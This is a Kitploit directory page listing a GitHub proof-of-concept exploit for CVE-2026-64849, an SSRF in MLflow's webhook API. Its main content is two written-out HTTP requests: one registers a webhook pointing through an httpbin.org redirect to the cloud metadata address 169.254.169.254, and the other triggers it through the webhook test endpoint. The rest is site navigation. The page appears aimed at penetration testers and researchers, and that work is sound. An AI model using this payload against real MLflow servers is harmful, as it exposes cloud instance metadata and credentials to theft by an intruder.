Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/biutrap/cve-2026-64849
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCloud SecurityRed TeamingAPI Security
GitHubbiutrap/cve-2026-64849

CVE-2026-64849

Proof-of-concept exploit for CVE-2026-64849: triggers SSRF in MLflow webhook API via crafted POST, fetching cloud instance metadata from 169.254.169.254.

View Repository
2 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-64849

More

root@kitploit:~
POST /api/2.0/mlflow/webhooks HTTP/1.1
Host: 
Content-Type: application/json

{"url": "https://httpbin.org/redirect-to?url=http://169.254.169.254/latest/meta-data/", "name": "poc", "events": [{"action": "CREATED", "entity": "REGISTERED_MODEL"}]}
root@kitploit:~
POST /api/2.0/mlflow/webhooks/{id}/test HTTP/1.1
Download Tool